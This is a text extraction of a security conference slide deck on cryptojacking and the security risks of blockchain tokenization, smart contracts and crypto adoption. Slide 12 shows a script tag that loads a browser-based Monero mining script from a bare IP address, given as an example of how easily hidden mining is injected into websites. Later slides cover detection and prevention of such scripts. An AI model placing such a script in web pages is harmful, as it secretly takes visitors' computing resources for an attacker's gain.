  • 1. Evolution of a Hack CryptoJacking, CryptoCurrencies, and Blockchains
  • 2. Preliminaries ▪ Bryan Becker, CISSP, CCSP ▪ More Futurist, less Crypto-Maximalist ▪ Terrified of CRISPR ▪ All opinions my own and not that of my employer. ▪ DISCLAIMER: Bad Words! ▪ I Promise. ▪ Slap me if I talk about bitcoin price. ▪ None of this should be considered financial advice.
  • 3. Agenda ▪ CryptoJacking and newer, rebranded attacks against companies with efforts to exploit resources using blockchain public chains and technologies. ▪ Are we ready for an “Internet of Literal Things Encapsulated in Tokens” revolution from a security perspective?
  • 4. Top 5 Uses of Public Blockchain Tokens! ▪ GIVEAWAY ▪ #5 – Useless Ethereum Token (UET) ▪ FAQ: “Wait … is this a joke? Is it a scam? Neither! This is real — and it’s 100% transparent. You’re literally giving your money to someone on the internet and getting completely useless tokens in return.” ▪ #4 -- SpankChain ▪ #3 -- PotCoin ▪ #2 – C**kBlockChain ▪ #1 -- F*ckToken -- $0.00005.
  • 6. Blockchain Fundamentals ▪ Distributed Ledger ▪ Consensus by Code ▪ Digital Scarcity ▪ Programmability (Smart Contracts)
  • 7. Blockchain Fundamentals - “What is a Wallet” ▪ AN INTERFACE WHICH INTERACTS WITH A BLOCKCHAIN. ▪ It doesn’t store money, it stores and interacts private keys . ▪ It’s not a “place”, it’s an interface to pub/private key pairs to handle crypto assets. ▪ It can be… ▪ As simple as a piece of paper ▪ A fat client ▪ Mobile App ▪ Browser Extension ▪ Hardware token
  • 8. How Proof of Work Consensus Works ▪ Transactions get broadcasted to a node ▪ Node adds transaction to a block (small file of transactions) ▪ All other validators do math during the blocktime. ▪ One validator wins the block discovery, adds the block to the chain, and “wins” the lottery for freshly minted tokens for security incentive for ”Proof of Work”
  • 10. CryptoJacking History ▪ Bitcoin browser-based mining: A thing since 2011. ▪ No ASICS ▪ Bitcoin was cheap and mining was profitable (don’t slap me!) ▪ Bitcoinplus.com ▪ Mostly disappeared with the onset of new technology. ▪ More things change, the more they stay the same…
  • 11. Current Risk: CryptoJacking ▪ CryptoJacking a.k.a. Harvest of distributed computing resources (CPU, Memory, Disk, Bandwidth) for financial gain of attacker. ▪ With the coin mining gold rush, cryptojacking attacks skyrocketed 8,500 percent ▪ DRUPALGEDDON 2: 400 Drupal Websites hit using latest vuln. ▪ Shopify Plugin creates 5 iFrames which mines Monero. ▪ Showtime, UFC.TV. ▪ Weatherfor.us plugin for websites injects mining scripts. ▪ Fileless malware Ghostminer kills other cryptojacking competitors and mines in memory and is nearly undetectable. ▪ CoinHive == CryptoJacking as a Service (CJaaS?)
  • 12. It’s Literally This Easy (Invisible Browser Mining) <script type='text/javascript' src='http://174.138.43.214/wp- content/plugins/simple-monero-miner-coin-hive/js/smmch- mine.js?v=1.4&#038;ver=4.9.5'></script> Open source rig: https://github.com/xmrig/xmrig
  • 13. Detection and Prevention ▪ Mostly detected at the network level (now) ▪ Resource Utilization and Monitoring ▪ Browser Level Detections via Software or Extensions (NoCoin, MinerBlock) ▪ Injection detection. ▪ No-Script ▪ IDS/IPS rules for DNS calls (DNS sinkholes) ▪ Anomaly Detection for Network Baseline monitoring ▪ BUILT-IN BROWSER restrictions ▪ NUCLEAR OPTION: Disable JavaScript
  • 14.
  • 15. DEMO!!!! ▪ DEMO WORLD, PARTY TIME, EXCELLENT!
  • 16. CryptoJacking Future/Potential ▪ Why the resurgence? ▪ Privacy Based Coins ▪ Ease of Deployment ▪ Hard to find if throttled ▪ Mobile explosion ▪ Fundamental Profitability Problem ▪ CoinHive maxed out at 13.5 MH/s == ~5% of the Monero Hash Pool. Month by Month percentage change in Browser-based Mining. (Symantec)
  • 17.
  • 18. Future Forms of CryptoJacking ▪ The Future of Monetization ▪ Evolution of current attacks ▪ WannaMine worm (ETERNALBLUE) ▪ GhostMiner ▪ GPU, File Storage ▪ IoT-focused CryptoJacking ▪ RadiFlow ICS Mining ▪ NEW TARGETS ▪ Fogs ▪ Kubernetes Clusters
  • 19. CryptoJacking for Charity! ▪ UNICEF ▪ www.thehopepage.org
  • 20.
  • 22. Part 2 Evolution of a Hack  Tokenized “Asset-ful” Data Structures
  • 23. Security with Tokenized “Asset-ful” Data Structures ▪ “I recall hearing in recent years, if you were a “startup” until you reached a certain revenue threshold, security should not be a major concern or spend area.” – Director-level Consultant in Boulder. ▪ You cannot mess up something decentralized in a fundamental way; anything less than absolute correctness is absolute failure. — Charles Noyes
  • 24. The Internet of Money ▪ Web 3.0! ▪ Tokenize ALL THE THINGS! ▪ Make the world more liquid! ▪ Assets on the blockchain! ▪ Eliminate the middle man with smart contracts! ▪ EVERYTHING on the Blockchain! ▪ Health Records, Identity, Supply Chains, Security Tokens, Real Assets
  • 25. What a time to be alive! ▪ “We rarely see people talking about what will form the main usage of Blockchain: Robots and Machines. This isn't going to be about whether grandpa or grandma, mommy or daddy are gonna want to use Blockchain or not. We are talking about the billion of interconnected devices which, for the first time in technological history, will be able to transact value from device to device, in a safe, fast and trustable manner.” ▪ In the near-future, the Internet of Things will move money and assets autonomously or as directed by a DAO or AI.
  • 26.
  • 27. Adoption: Blockchain news from the past 4 weeks days. ▪ “In the future, owning an asset and not having it tokenized on the blockchain will be the equivalent of owning a company and not being on the Internet today.” – Crypto Hedge Funder ▪ Bloomberg and Galaxy Digital just announced they're launching a cryptocurrency index to track 10 of the most liquid crypto assets. ▪ China's Ministry of Public Security is planning to use blockchain technology to drastically improve their handling of evidence from police investigations. ▪ Facebook is launching an internal team to exclusively focus on blockchain tech. The team is led by David Marcus, former PayPal President & current Coinbase board member
  • 28. Adoption: Blockchain news from the past 4 weeks days. ▪ Oracle, the fourth largest software company in the world according to Forbes, is launching their blockchain products this month. ▪ Consensys and Saudi Arabia‘s Ministry of Communications and Information Technology recently held a blockchain bootcamp to teach the skills necessary for this new world. ▪ JPMorgan filed a patent to use blockchain for Bank-to-Bank transactions. ▪ Goldman Sachs is opening a Bitcoin trading operation. ▪ The South Korean Central Bank is planning to use cryptocurrencies to achieve a truly cashless society by 2020
  • 29.
  • 30.
  • 31. Wall Street Journal: Paul Vizla
  • 32. Wait, WHAT?!??! WHAT ARE WE THINKING ▪ Coinbase Bug Allowed Users to Give Themselves Unlimited Ether - Gizmodo ▪ Founders of a cryptocurrency backed by Floyd Mayweather charged with fraud by SEC - CNBC
  • 33. Wait, WHAT?!??! WHAT ARE WE THINKING • Malware which monitors clipboards. • Smart Contract coding vulnerabilities (PARITY)
  • 34. Blockchains and Government ▪ Governments which recognize Smart Contracts as law ▪ Tennessee ▪ Arizona ▪ Florida ▪ More to come
  • 35. Some Inconvenient Truths ▪ Most dApps don’t even need a blockchain. ▪ Users can’t even handle a password, now you want them a wallet and a private key? ▪ CONFIDENTIALITY BROKEN. ▪ Smart Contracts are still written by humans. ▪ Criminals flock to where the low hanging fruit is.
  • 36. Some Inconvenient Truths ▪ Validator nodes are still servers run by someone. ▪ Internal blockchains validator nodes still are servers handled by humans. ▪ INTEGRITY BROKEN. ▪ PARADIGM CHALLENGE ▪ “Move fast and break” things for systems with tokenized assets is not an effective development strategy. ▪ Check ourselves before we wreck ourselves. ▪ Governance, governance, governance.
  • 37. The Power of Programmers: A New Ethics Dilemma ▪ Security Token explosion coming. ▪ Assets, such as houses, supply chains, physical money, gold bullion. ▪ Programmers writing protocols which: ▪ Store assets. ▪ Move assets ▪ Use smart contracts to hold assets in “virtual escrow” ▪ These protocols will run be the foundation of mutual funds, asset portfolios, money transfers, holding institutions, and the like.
  • 38. Recommendations for our Industry ▪ NIST guidance paper(s) and Blockchain Security Framework. ▪ Overall guidelines on the tech and deployment. ▪ Internal Governance. ▪ GLB-like law for FinTech with Blockchains. ▪ Privacy Law Update. Blockchain Won’t Make it Better. ▪ Makes Law Enforcement that much harder. ▪ Massive Education Investments needed.
  • 39. Recommendations for our Industry ▪ Reuse the Good Code! ▪ Opensource Shared User Models and pre-Deployed Contract Modules. ▪ KNOW YOUR RISK: Flipping the Development Paradigm on it’s head. ▪ Move slow so no one loses their house. Security First! ▪ Develop more smart contract auditors. ▪ Inning 2. Know Risks, Continue to Improve.
  • 40. <FIN> ▪ Questions and Answer. ▪ QR me  ▪ Bryan Becker ▪ @_beckerb